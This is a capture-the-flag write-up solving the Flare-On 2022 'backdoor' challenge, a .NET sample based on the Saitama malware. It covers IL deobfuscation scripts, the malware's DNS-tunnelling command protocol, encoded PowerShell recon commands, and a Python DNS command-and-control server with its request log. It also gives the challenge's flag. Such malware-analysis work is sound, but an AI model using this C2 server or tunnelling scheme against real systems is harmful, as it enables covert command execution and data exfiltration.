Flare-On 2022: backdoor

backdoor is the hardest challenge in the 2022 Flare-On challenge, and one of the harder ones I’ve done. The sample is a .NET binary, but most the functions are heavily obfuscated. I’ll deobfuscate through two different processes, patching assembly back into the binary to get something that DNSpy can reverse. Eventually I’ll find a real malware sample, the Saitama backdoor, that executes command and control over DNS. Once I understand the DNS protocol, I’ll write a DNS server to send commands in the required order to trigger the flag.
I’m such a backdoor, decompile me why don’t you…
The download contains a 32-bit Windows .NET executable:
oxdf@hacky$ file FlareOn.Backdoor.exe
FlareOn.Backdoor.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Run It
Running FlareOn.Backdoor.exe
just opens a window and hangs:

Every 30-40 seconds, there will be some DNS requests issued, visible in Wireshark:

It also creates a file in the same directory, flare.agent.id
, which contains a dash and a number:
Initial Analysis
General Structure
Loading the binary into DNSpy, there are 16 classes, FLARE01
, and Program

Each of the classes have a bunch of functions, most named flare_xx
or flared_xx
. For example:

The numbers of the flare_*
functions often match up with or at least close to the flared_*
functions, but not exactly or always. In almost all cases, there are the same number of flare_*
and flared_*
functions in each class.
The Program
class has a similar structure, with a Main

.NET programs have a couple different heaps used for various functions, and one is the User String heap (also called #US
). DNSpy shows it in the Metadata
section, but doesn’t give details beyond that. ILSpy gives access to the strings themselves:

Just with the strings in that image above, I can guess that there’s going to be base32-encoded data, as well as some ability to run commands, both with cmd /c
and with powershell -enc
which takes a base64-encoded string.
Some other strings that jump out include:
Two strings that look like a base36 alphabet and perhaps a custom / shuffled base32 alphabet:
Groups of three strings that each go number, three hex characters, and a command (either in plain ascii or base64-encoded):
There are 21 of these, with the first number covering all possibilities 1-21. Decoding the strings, they each look like reconnosiance commands malware might run:
Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress
looks like a configuration class, with many of the variables unobfuscated:

Of particular interest is chars_counter
and chars_domain
, each of which are all lowercase characters and digits, each once, and chars_counter
has the order mixed up in order:

I’ll also note alive_key
and the _domains
list has just “flare-on.com”.
flare / flared Functions
Each flare_*
function has the same basic format. For example, flare_69
in FLARE15
public static byte[] flare_69(string h)
byte[] result;
result = FLARE15.flared_69(h);
catch (InvalidProgramException e)
result = (byte[])FLARE15.flare_71(e, new object[]
}, FLARE15.gs_m, FLARE15.gs_b);
return result;
The function will try to call a corresponding flared_*
function, with the same function signature (argument types and return values), and save the return in a variable called result
. If the flared_*
function were to throw an InvalidProgramException
, then that is caught and passed to either flare_71
or flare_70
. In both cases, the exception and an array of the original arguments are passed in. For the flare_71
cases, two other values are passed in as well, variables in FLARE15
. Even flare_70
fits this pattern:
public static object flare_70(InvalidProgramException e, object[] a)
object result;
result = FLARE15.flared_70(e, a);
catch (InvalidProgramException e2)
result = FLARE15.flare_71(e2, new object[]
}, FLARE15.wl_m, FLARE15.wl_b);
return result;
All the flared_*
functions fail to decompile in DNSpy:

Trying a different tool, ILSpy, shows similar results:

Starting Point
also files this pattern, though it also calls flare_74
before calling flared_38
public static void Main(string[] args)
catch (InvalidProgramException e)
FLARE15.flare_70(e, new object[]
Stepping through this, flare_74
works just fine (details below), but flared_38
throws an InvalidProgramException
, which is passed to flare_70
(which as shown above tries to call flared_70
, throws an exception itself, and that is passed to flared_71
is different from the rest in that it lacks the call / generate exception format. Instead, it simply initializes the variables in FLARE15

Each *_b
variable is an array of bytes, and each *_m
is a dictionary with uint
keys and int
values. These come in pairs, except for rt_b
, which has no corresponding rt_m
is also different, as it’s an ObservableCollection
object, which seems to be a list of ints in the single byte range:
FLARE15.c = new ObservableCollection<int>
Layer 1 Deobfuscation
Analysis of Creating Dynamic Function
starts by taking the exception, using it to get a StackTrace
, and using that to get the MetadataToken
to the top frame, which would be the function that caused the crash. Metadata tokens are a key part of how .NET / C# is compiled, and each thing like functions and local variable has one. This short post does a nice job summarizing.
If I debug into this function, I’ll see the token fetched matches the token next to the function name in DNSpy. The first visit into flare_71
is triggered from a failure in flared_70

That token is then used to get the method, it’s parameter specifications, local variables, etc. All of these are duplicated into a new DynamicMethod

Analysis of Patching Metadata Tokens
Each call to flare_71
also gets an array of bytes (b
) and a dictionary (m
). Then there’s a loop over the items in m
. For each value in m
, it tries several different ways to resolve the token based on the module, effectively getting the correct token for the new dynamic function:
foreach (KeyValuePair<uint, int> keyValuePair in m)
int value = keyValuePair.Value;
uint key = keyValuePair.Key;
bool flag = value >= 1879048192 && value < 1879113727;
int tokenFor;
if (flag)
tokenFor = dynamicILInfo.GetTokenFor(module.ResolveString(value));
MemberInfo memberInfo = declaringType.Module.ResolveMember(value, null, null);
bool flag2 = memberInfo.GetType().Name == "RtFieldInfo";
if (flag2)
tokenFor = dynamicILInfo.GetTokenFor(((FieldInfo)memberInfo).FieldHandle, ((TypeInfo)((FieldInfo)memberInfo).DeclaringType).TypeHandle);
bool flag3 = memberInfo.GetType().Name == "RuntimeType";
if (flag3)
tokenFor = dynamicILInfo.GetTokenFor(((TypeInfo)memberInfo).TypeHandle);
bool flag4 = memberInfo.Name == ".ctor" || memberInfo.Name == ".cctor";
if (flag4)
tokenFor = dynamicILInfo.GetTokenFor(((ConstructorInfo)memberInfo).MethodHandle, ((TypeInfo)((ConstructorInfo)memberInfo).DeclaringType).TypeHandle);
tokenFor = dynamicILInfo.GetTokenFor(((MethodInfo)memberInfo).MethodHandle, ((TypeInfo)((MethodInfo)memberInfo).DeclaringType).TypeHandle);
It’s not super important to understand this in detail, other than to say that value
is the metadata token that would be used in the real function, and it uses that to get the right tokens in place so that the dynamic assembly will work.
Then it patches the four bytes at key
offset into b
using the retrieved token:
b[(int)key] = (byte)tokenFor;
b[(int)(key + 1U)] = (byte)(tokenFor >> 8);
b[(int)(key + 2U)] = (byte)(tokenFor >> 16);
b[(int)(key + 3U)] = (byte)(tokenFor >> 24);
After the loop is complete, and each token from the dict is updated, the buffer of bytes, b
, is set as the code for the dynamic method and then called:
dynamicILInfo.SetCode(b, methodBody.MaxStackSize);
return dynamicMethod.Invoke(null, args);
Analysis of flare_71 Invocations
is called 7 times, once each with each pair of _b
and _m
variables as follows:
Triggering Function | Variables |
flared_70 |
wl_* |
flared_35 |
pe_* |
flared_47 |
db_* |
flared_66 |
gh_* |
flared_67 |
cl_* |
flared_68 |
rt_* |
flared_69 |
gs_* |
I noted that there was no rt_b
. flare_68
calls flare_71
with an empty dictionary:
result = (int)FLARE15.flare_71(e, new object[]
}, new Dictionary<uint, int>(), FLARE15.rt_b);
That just implies that there are no metadata tokens in that function, which fits as rt_b
is very short (55 bytes).
Unfortunately the DNSpy debugger will not show the updated code as it executes. To see what these functions are doing, I’ll need to patch the binary with the correct functions. This can be achieved by getting each of the _b
byte arrays and patching in the metadata tokens from the _m
dictionaries. I’ll save each of these into a file named patch_bufs.py
by copying them out of DNSpy and using some vim
macros to quickly reformat them into their Python equivalents.
I’ll also need the offsets for each function, which I can get from DNSpy:

The value in the box, 0x1acec, is actually the start of the metadata for the function. Clicking it will show the hex editor, and hovering will show the function:
The program byte code goes after the metadata, typically 0xc bytes after the address given as the “File Offset”. For flared_69
, the given offset is 0x1acec, but I’ll want to patch at 0x1acf8
Then I can create a function to patch, and call it for each of the seven:
#!/usr/bin/env python3
import struct
import sys
import patch_bufs as pb
def apply_patch(exe, offset, b, m):
func_bytes = bytes(b)
for off, val in m:
func_bytes = func_bytes[:off] + struct.pack("<I", val) + func_bytes[off+4:]
return patch_const(exe, offset, func_bytes)
def patch_const(exe, off, b):
patched_exe = exe[:off] + b + exe[off + len(b):]
return patched_exe
if len(sys.argv) != 3:
print(f"{sys.argv[0]} in_file out_file")
with open(sys.argv[1], 'rb') as f:
exe = f.read()
exe = patch_const(exe, 0x9ce7, 0x200.to_bytes(4, 'little')) # max_alive_delay
exe = patch_const(exe, 0x9cdd, 0x100.to_bytes(4, 'little')) # min_alive_delay
exe = patch_const(exe, 0x9d07, 0x200.to_bytes(4, 'little')) # max_check_delay
exe = patch_const(exe, 0x9cfd, 0x100.to_bytes(4, 'little')) # min_check_delay
exe = apply_patch(exe, 0x1ae10, pb.wl_b, pb.wl_m) # patch 70
exe = apply_patch(exe, 0x19b90, pb.gh_b, pb.gh_m) # patch 66
exe = apply_patch(exe, 0x1acf8, pb.gs_b, pb.gs_m) # patch 69
exe = apply_patch(exe, 0x19e0c, pb.cl_b, pb.cl_m) # patch 67
exe = apply_patch(exe, 0x1ac5c, pb.rt_b, []) # patch 68
exe = apply_patch(exe, 0x0abec, pb.pe_b, pb.pe_m) # patch 35
exe = apply_patch(exe, 0x0b580, pb.d_b, pb.d_m) # patch 47
with open(sys.argv[2], 'wb') as f:
While I’m in here, I’ll also patch some of the delay times in FLARE03
just to reduce waiting in the future.
On running this and loading the new binary into DNSpy, I’ll see the deobfuscated functions, for example:
public static byte[] flared_69(string h)
string location = Assembly.GetExecutingAssembly().Location;
FLARE09 flare = new FLARE09();
byte[] array = null;
using (FileStream fileStream = new FileStream(location, FileMode.Open, FileAccess.Read))
foreach (FLARE09.IMAGE_SECTION_HEADER image_SECTION_HEADER in flare.ImageSectionHeaders)
bool flag = h.StartsWith(new string(image_SECTION_HEADER.Name));
if (flag)
array = new byte[image_SECTION_HEADER.VirtualSize];
fileStream.Seek((long)((ulong)image_SECTION_HEADER.PointerToRawData), SeekOrigin.Begin);
fileStream.Read(array, 0, (int)image_SECTION_HEADER.VirtualSize);
return array;
Of the seven functions now deobfuscated, flared_38
is the one called from main
, and it looks like the main
public static void flared_38(string[] args)
bool flag;
using (new Mutex(true, "e94901cd-77d9-44ca-9e5a-125190bcf317", ref flag))
bool flag2 = flag;
if (flag2)
FLARE13 flare = new FLARE13();
for (;;)
switch (FLARE13.cs)
case FLARE08.A:
case FLARE08.B:
case FLARE08.C:
case FLARE08.D:
case FLARE08.E:
case FLARE08.F:
case FLARE08.G:
case FLARE08.H:
catch (Exception ex)
It creates a mutex (to ensure only one instance runs at a time), creates a FLARE13
object, calls a couple functions, and then enters a infinite loop switching on FLARE13.cs
looks like a kind of state machine. FLARE08
is an enum structure, likely the states:

- H
are the constant values 0 - 8.
takes a FLARE07
as an argument. In the first case, it takes a static one. The rest call a function that must return a FLARE07
Layer 2 Deobfuscation
, like almost all of the rest of the functions, tries to call flared_50
, with an exception caught and passed to flare_70
. To really understand what’s going on, I’ll need to understand how flare_70
works. It is actually just a wrapper to call flared_70
deobfuscated by flare_71
, but in my patched binary I can just look at flared_70
public static object flared_70(InvalidProgramException e, object[] a)
StackTrace stackTrace = new StackTrace(e);
int metadataToken = stackTrace.GetFrame(0).GetMethod().MetadataToken;
string h = FLARE15.flare_66(metadataToken);
byte[] d = FLARE15.flare_69(h);
byte[] b = FLARE12.flare_46(new byte[]
}, d);
return FLARE15.flare_67(b, metadataToken, a);
The four local functions called here are all ones handled by flare_71
, so they are clear now.
takes the following steps:
- Gets the metadata token for the function the function that triggered the exception.
- Passes that to
pulls together a bunch of data about the function and hashes it, returning a SHA256 hash. - The hash is passed to
, which loops through all the section headers, looking for one that matches the start of the hash and returns the data in that section. - The data is passed to
, which is a simple RC4 function, with a static four byte key. - The resulting buffer is passed to
, along with the metadata token and the original arguments for the function.
is similar to flare_71
with some differences. It starts out defining a large dictionary, similar to the m
variables from flare_71
. It does the same stuff to get the local variables and parameters for the corrupt function, and then loops over the input buffer, b
. It’s a bit more complicated in how it identifies and replaces tokens, but at a high level it’s clear that if the case is FLARE06.OT.B
, then it does the same kind of thing as in flare_71
with the tokens, only it also has to apply an XOR first:

Rather than try to recreate all of this process (some of which is quite complicated), I’ll set a break point at the top of this loop. When this is hit, I can see the function being deobfuscated, as well as the buffer of ILAsm that’s about to have it’s tokens fixed.

I’ll right click on b
and save it to a file, and then implement the token bits on my own.
The num
variable is what’s used just like the tokens in the previous round to get the correct tokens for the dynamic method. That implies, that after XOR, it is the token I want to run if patching.
This all leads to another function in my script:
def apply_patch_file(exe, off, fn):
with open(fn, 'rb') as f:
b = f.read()
j = 0
while j < len(b):
if b[j] == 254:
key = 65024 + b[j+1]
j += 1
key = b[j]
ot = pb.dict67[key]
j += 1
if ot == 1:
num = b[j+3] * 16777216 + b[j+2] * 65536 + b[j+1] * 256 + b[j]
num ^= 2727913149
b = b[:j] + struct.pack("<I", num) + b[j+4:]
j += 4
elif ot == 2 or ot == 4:
j += 1
elif ot == 3 or ot == 6:
j += 4
elif ot == 5:
j += 2
elif ot == 7:
j += 8
elif ot == 8:
j += 4 + b[j+3] * 16777216 + b[j+2] * 65536 + b[j+1] * 256 + b[j]
return patch_const(exe, off, b)
For for flared_38
, I’ll get the function offset the same way as above, and add this call:
exe = apply_patch_file(exe, 0xaf18, 'bins/38.bin')
This is very tedious, as I’ll need to do this for 46 functions before I can solve that box. Still, it’s the best method I could come up with. After patching, I’ll have to reload the binary into DNSpy. I’ll always drop a breakpoint in flared_70
to catch any new code paths visited.
Doing this, I’m able to patch 34 more functions.
While I was busy decoding functions, I was chatting with Diefunction, who figured out (without any decoded functions) that this sample is based on the following logic:
- The malware is clearly using some kind of DNS tunneling.
- Searching on the Mandiant blog for recent articles didn’t return much.
- Some more poking around for articles on recent samples using DNS tunneling led to a post on MalwareByte’s blog, How the Saitama Backdoor uses DNS Tunneling from May this year. This seemed like a likely candidate.
- This GitHub repo has a tool to translate Saitama malware.
The blog post talks about using a custom base36 alphabet, which is what I noticed above. I’ll update the base64 string in translate.py
as so:
t = Translator(basestring='amsjl6zci20dbt35guhw7n1fqvx4k8y9rpoe')
for req in sys.argv[1:]:
translated = t.translate_req(req)
print (translated)
Now running that on the domain I observed earlier shows a count that’s equal to the number in the flare.agent.id
file, 36262:
oxdf@hacky$ python translate.py nx3n4pw14e0.flare-on-com
agent_id: 0, msg_type: 0, msg_offset:616, msg_size:None, msg_content:b's', request:nx3n4pw14e0.flare-on-com, count:36262
Trying the same thing a couple more times shows it consistently matches. This is a great indicator that this malware is a modified Saitama.
Real Sample
I’ll grab the hash from the MalwareBytes blog and find a copy on malware bazaar. This is real malware, so I’ll want to be very careful not to run it. But I’ll download it and load it into DNSpy:

It doesn’t have the obfuscation that’s present in the challenge, so each class has half as many functions.
The #US
heaps has similar strings:

At the bottom, it has the numbers 1-22, with 22 strings that follow either commands or base64 commands:

So this is similar, but different in that in the challenge:
- the numbers are out of order;
- the numbers and commands are grouped, rather than all the numbers, then all the commands;
- there’s no three-character hex strings with each grouping.
Matching Classes
It’s pretty easy to look at the functions and their arguments / return types and start matching up classes from the real malware with the flare sample. For example, the first class in the malware is Base32Encoding
, which matches up really nicely with FLARE01

Looking through these, I can match them up to the various FLARE
FLARE01 = Base32Encoding
FLARE02 = Cmd
FLARE03 = Config
FLARE04 = Deflate
FLARE05 = DnsClass
FLARE06 = Enums
FLARE07 = MachineCommand
FLARE08 = MachineState
FLARE10 = RandomManager
FLARE11 = RandomMersenneTwister
FLARE13 = StateMachine
FLARE14 = TaskClass (with a lot more)
FLARE15 = Util (plus some obfuscation stuff)
Program = Program
was the most difficult to match up. But looking at the main loop, the fifth option shows that FLARE14.flare_52
is the same as TaskClass.DoTask
has a bunch more functions, so those will be interesting to look at.
I wasn’t able to find matches for FLARE09
or FLARE12
is just the RC4 function, used for obfuscation.
is called as part of deobfuscation, and I never identified the other two functions. There’s also a lot of variables having to do with the file structure (used for deobfuscation):

Get Into FLARE14
At this point, it’s clear that I need to get into FLARE14
, but the code isn’t going there, and thus I can’t decrypt it via the method I’ve been using. I did note that there is a state in the main program (flared_38
) that calls FLARE14.flare_52
(which calls flared_56
Right now there’s no resolution for the domain name, so it’s not progressing to
Looking in the Saitama sample, that looks like calling TaskClass.DoTask()
from the state Do
C2 Protocol
The blog post shows that the first request is the malware registering, and I’ll need to send back any three bytes followed by an ID.
The next request will be a request for command. The first response is an IP that gives the length of the command coming back, and then the next resolutions have the raw command.
The post lays out five types of commands:

The same numbers are in the sample, in the Emuns
class, under TaskType
, and in FlareOn under FLARE06
under TT

Let’s say I want to run ver
like in the blog post. The command will be of type 70
, and then the following bytes will be “ver”. So the overall length will be four.
This means the first response be
to indicate a length of four, and then
(where 118, 101, and 114 are “v”, “e”, and “r”).
DNS Server
I’ll write a small DNS server using Python:
import socket
from dnslib import DNSRecord, RR
# Global variables
IP = ""
PORT = 53
def ip_gen():
yield '' # id
yield '' # len for "ver" cmd
yield '' # ver cmd
while True:
yield ''
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((IP, PORT))
print('DNS Listening on {0}:{1} ...'.format(IP, PORT))
for i, ip in enumerate(ip_gen()):
while True:
data, address = sock.recvfrom(650)
dnsrecord = DNSRecord.parse(data)
if dnsrecord.questions[0].get_qname().matchSuffix('flare-on.com'):
domain = str(dnsrecord.questions[0].get_qname())
print(f"[*] Got request for {domain}")
print(f"[*] Sending response {i}: {ip}")
dnsrecord.add_answer(*RR.fromZone(f'{domain} IN A {ip}'))
sock.sendto(dnsrecord.pack(), address)
Most of this is just setting up the DNS server. I don’t need threads or anything complicated as I’m just responding to one client. It makes sure to filter on only requests for *.flare-on.com
, as Windows can be chatty. Then it gets the next response, and sends it.
The ip_gen
function is a generator function, which means i can loop over it, and each yield
will be a result.
Additional Functions
I’ll set the DNS server in my Windows VM to point to my Linux VM where I’m running this script, and I get twelve more functions, including flared_56
$ python dns_c2-v1.py
DNS Listening on ...
[*] Got request for evxe1.flare-on.com.
[*] Sending response 0:
[*] Got request for 9jxef.flare-on.com.
[*] Sending response 1:
[*] Got request for wkf000xeq.flare-on.com.
[*] Sending response 2:
[*] Got request for 85hgggggfcquw4ktq1muifxev.flare-on.com.
[*] Sending response 3:
[*] Got request for 5fetttxex.flare-on.com.
I’ll also see a file in the same folder at the binary, flare.agent.recon.etr3f
Microsoft Windows [Version 10.0.19044.1288]
It seems the command was run.
Function Overview
from the mawlare (or flared_56
from the challenge) is long, but not difficult to follow. It starts by checking if there are tasks, and if so, getting the first one, it’s TaskType
, and saving it’s data into array2
// Saitama.Agent.TaskClass
// Token: 0x06000026 RID: 38 RVA: 0x00002C80 File Offset: 0x00000E80
public static MachineCommand DoTask()
MachineCommand machineCommand = MachineCommand.Failed;
if (TaskClass.ListData.Count > 0 && TaskClass.ListData[0] != null)
byte[] array = TaskClass.ListData[0];
Enums.TaskType taskType = (Enums.TaskType)array[0];
byte[] array2 = array.Skip(1).ToArray<byte>();
byte[] resultData = null;
Now there are switches based on taskType
. If it’s a file related type, it writes the rest of the data to a file, which isn’t that interesting to this challenge. If it’s a Static
type, then it hashes the rest of the string and does a bunch of comparisons, eventually falling back to comparing the text to static numbers, and setting text
based on that:
if (taskType == Enums.TaskType.File || taskType == Enums.TaskType.CompressedFile)
...[snip]... //
if (taskType == Enums.TaskType.CompressedCmd)
array2 = Deflate.Decompress(array2);
string cmd = Encoding.UTF8.GetString(array2);
Thread thread = new Thread(delegate()
string text = cmd;
if (taskType == Enums.TaskType.Static)
uint num2 = <PrivateImplementationDetails>.ComputeStringHash(text);
if (num2 <= 518729469U)
if (num2 <= 434841374U)
if (num2 <= 350953279U)
if (num2 != 334175660U)
if (num2 == 350953279U)
if (text == "19")
else if (text == "18")
string s2 = Cmd.ShrinkCmdResult(Cmd.ExecCmd(text));
resultData = Encoding.UTF8.GetBytes(s2);
At the end, it runs text
, which is either the c2 input (for TaskType.Cmd
), decompressed input (for TaskType.CompressedCmd
), or a static string loaded from the input by number (for TaskType.Static
). The results are processed, queued for transmission back over DNS.
Difference in flared_56
There’s only one major difference in flared_56
, and it’s in the Static
section. In the malware, if the static command is 19, it looks like this:
if (text == "19")
In the challenge, it looks like this:
bool flag15 = text == "19";
if (flag15)
FLARE14.flare_56(int.Parse(text), "146");
text = FLARE02.flare_04("JChwaW5nIC1uIDEgMTAuNjUuNDUuMyB8IGZpbmRzdHIgL2kgdHRsKSAtZXEgJG51bGw7JChwaW5nIC1uIDEgMTAuNjUuNC41MiB8IGZpbmRzdHIgL2kgdHRsKSAtZXEgJG51bGw7JChwaW5nIC1uIDEgMTAuNjUuMzEuMTU1IHwgZmluZHN0ciAvaSB0dGwpIC1lcSAkbnVsbDskKHBpbmcgLW4gMSBmbGFyZS1vbi5jb20gfCBmaW5kc3RyIC9pIHR0bCkgLWVxICRudWxs");
FLARE14.h.AppendData(Encoding.ASCII.GetBytes(FLARE14.flare_57() + text));
The encoded PowerShell is different, but there’s also two additional functions, flare_56
(which calls flared_55
, not to be confused with flared_56
, which is the DoTask
function), and flare_57
. Neither of these have been decoded yet.
Send Static Command
I’ll update my DNS server to send a static command:
def ip_gen():
yield ''
yield ''
yield ''
#yield ''
while True:
yield ''
It will send
and then
- Any number between 129 and 2550.0.3
- the size of 3 bytes43
- padding to reach full IP
With a break point at the first call once it checks if the input is “19”, I’ll run it, and it hits:

This confirms my DNS C2 is correct. It also gets me the chance to decode a bunch more functions.
deobfuscates flared_55
, which is the key to getting the flag:
public static void flared_55(int i, string s)
bool flag = FLARE15.c.Count != 0 && FLARE15.c[0] == (i ^ 248);
if (flag)
FLARE14.sh += s;
FLARE15.c.Remove(i ^ 248);
FLARE14._bool = false;
is initialized in that first initialization function, flare_74
, to an array of 21 single byte ints. i
is the command I sent, and if i ^ 248
matches the first item in that array, it appends the three characters hex string to FLARE14.sh
, and removes that item from FLARE15.c
. This is defining the order of the commands I must send.
Get Flag
Calculate Order
is initialized at the very start in flare_74
FLARE15.c = new ObservableCollection<int>
In a Python terminal I can quickly find the command order:
>>> c = [250, 242, 240, 235, 243, 249, 247, 245, 238, 232, 253, 244, 237, 251, 234, 233, 236, 246, 241, 255, 252]
>>> [x^248 for x in c]
[2, 10, 8, 19, 11, 1, 15, 13, 22, 16, 5, 12, 21, 3, 18, 17, 20, 14, 9, 7, 4]
Update Script
I’ll need to update the DNS server to return these static commands in order:
import socket
from dnslib import DNSRecord, RR
# Global variables
IP = ""
PORT = 53
def ip_gen():
nums = map(str, [2,10,8,19,11,1,15,13,22,16,5,12,21,3,18,17,20,14,9,7,4])
yield ''
for n in nums:
yield f'129.0.0.{len(n) + 1}'
yield f'43.' + '.'.join([str(ord(x)) for x in n.ljust(3, '1')])
yield ''
This will calculate the length and then the IP for each command. It needs at least one IP at the end to get the flag.
Run It
With this C2 server in place, I’ll run the binary. It takes a bit of time:
oxdf@hacky$ python dns_c2.py
DNS Listening on ...
[*] Got request for 2p066l666qv4i0.flare-on.com.
[*] Sending response 0:
[*] Got request for f94id.flare-on.com.
[*] Sending response 1:
[*] Got request for a49kkk4ib.flare-on.com.
[*] Sending response 2:
[*] Got request for 43gzzzzz9sfehzq1e8b3x12d978kq4it.flare-on.com.
[*] Sending response 3:
[*] Got request for p47iikiiice4i3.flare-on.com.
[*] Sending response 4:
[*] Got request for 9elqqqqqj7dl6yam2yw7uq20w0c0q4i5.flare-on.com.
[*] Sending response 5:
[*] Got request for lr8uuauuulf4ig.flare-on.com.
[*] Sending response 6:
[*] Got request for 2sattttt8131balr37cj5yr4w74td4iu.flare-on.com.
[*] Sending response 7:
[*] Got request for lmiffkfffef4ih.flare-on.com.
[*] Sending response 8:
[*] Got request for urtwwwwwbz7yb6ntm1y7pabcujnlw4iw.flare-on.com.
[*] Sending response 9:
[*] Got request for flp66q666f44i7.flare-on.com.
[*] Sending response 10:
[*] Got request for j18ccccch0i7hed84a7i6yhnj9dlc4in.flare-on.com.
[*] Sending response 11:
[*] Got request for hsweepeeehf4i1.flare-on.com.
[*] Sending response 12:
[*] Got request for mrbddddd1vokude4km0r8c951atye4if.flare-on.com.
[*] Sending response 13:
[*] Got request for 5z466e666sm4iq.flare-on.com.
[*] Sending response 14:
[*] Got request for 5inpppppkoh2f9azhl72jk4iv.flare-on.com.
[*] Sending response 15:
[*] Got request for 9hn0004ix.flare-on.com.
[*] Sending response 16:
[*] Got request for mf2sssssyzxgy9627jgxkdy1mn64s4i4.flare-on.com.
[*] Sending response 17:
[*] Got request for 8ax66m666824ik.flare-on.com.
[*] Sending response 18:
[*] Got request for 13jcccccmb4jqgsud84reptdc6lba4i8.flare-on.com.
[*] Sending response 19:
[*] Got request for yz011t1119w4iy.flare-on.com.
[*] Sending response 20:
[*] Got request for zm3jjjjjvn986ec19pk8wv4i9.flare-on.com.
[*] Sending response 21:
[*] Got request for 7pwttt4ir.flare-on.com.
[*] Sending response 22:
[*] Got request for 6tlnnnnnevu7i9tz2kw0x9qco3rin4ip.flare-on.com.
[*] Sending response 23:
[*] Got request for gj7mmhmmmk64io.flare-on.com.
[*] Sending response 24:
[*] Got request for op9zzzzzh5xqj3s7x40qch4ie.flare-on.com.
[*] Sending response 25:
[*] Got request for aduqqq42a.flare-on.com.
[*] Sending response 26:
[*] Got request for 78wnnnnnqxg2jpjm16e2zw8kzi2mf42m.flare-on.com.
[*] Sending response 27:
[*] Got request for 50k77g7773w42s.flare-on.com.
[*] Sending response 28:
[*] Got request for be966666gfykjawi7u2mm67p241e642j.flare-on.com.
[*] Sending response 29:
[*] Got request for rpqzz0zzzcw42l.flare-on.com.
[*] Sending response 30:
[*] Got request for j3vsssssgmfwacpifqowyg426.flare-on.com.
[*] Sending response 31:
[*] Got request for wxhiii42z.flare-on.com.
[*] Sending response 32:
[*] Got request for v0jeeeeezyn8cd63n2h8sz42c.flare-on.com.
[*] Sending response 33:
[*] Got request for qzsnnn42i.flare-on.com.
[*] Sending response 34:
[*] Got request for os9jjjjj2xi5hlf4iap582422.flare-on.com.
[*] Sending response 35:
[*] Got request for a0vuuu420.flare-on.com.
[*] Sending response 36:
[*] Got request for nb9666667aoqi0croh4qx742d.flare-on.com.
[*] Sending response 37:
[*] Got request for 96rnnn42b.flare-on.com.
[*] Sending response 38:
[*] Got request for 3n6gggggat8tb6rf8cedu9f2sc25v42t.flare-on.com.
[*] Sending response 39:
[*] Got request for e0tkkmkkkuq423.flare-on.com.
[*] Sending response 40:
[*] Got request for l6oiiiiivqhqeo4xh8j2pgx7r8j4b425.flare-on.com.
[*] Sending response 41:
[*] Got request for csukkakkkew42g.flare-on.com.
[*] Sending response 42:
[*] Got request for ha3pppppn1rgq9d59ubaqsan02flz42u.flare-on.com.
[*] Sending response 43:
But then an image appears on the screen on my Windows VM:
Flag: W3_4re_Kn0wn_f0r_b31ng_Dyn4m1c@flare-on.com